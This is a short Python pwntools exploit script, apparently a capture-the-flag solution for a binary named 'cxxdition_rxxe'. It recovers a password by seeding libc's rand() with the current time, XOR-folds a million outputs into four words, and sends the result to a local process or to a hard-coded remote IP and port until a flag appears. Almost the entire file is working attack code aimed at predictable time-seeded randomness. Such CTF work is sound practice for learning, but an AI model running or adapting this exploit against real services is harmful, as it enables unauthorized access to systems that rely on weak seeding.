#!/usr/bin/python3
from pwn import *
from ctypes import *
import time


filename = "./cxxdition_rxxe"
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
host = '116.198.216.209'
port = 23333
elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
    libc = ELF(libcname)
gs = '''
b main
'''

def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript = gs)
    elif args.REMOTE:
        return remote(host, port)
    else:
        return process(elf.path)


lib_func = cdll.LoadLibrary(libcname)
seed = int(time.time() + 1)
lib_func.srand(seed)
passwd = [0, 0, 0, 0]

s = time.time()
for i in range(1000000):
    passwd[i%4] ^= lib_func.rand()
e = time.time()
print(e-s)
payload  = b''
payload += p32(passwd[0])
payload += p32(passwd[1])
payload += p32(passwd[2])
payload += p32(passwd[3])
p = start()
start_time = time.time()
while time.time() - start_time < 2:
    
    x = p.recvline(timeout=0.1)
    if b'flag{' in x:
        print(x)
        exit(0)
    if b'Password' in x:
        p.send(payload)
    # if b"I'm tired. Take a nap!" in x:
    #     p.send(payload)

    # elif b'Password' in x:
    #     p.send(payload*10)
exit(1)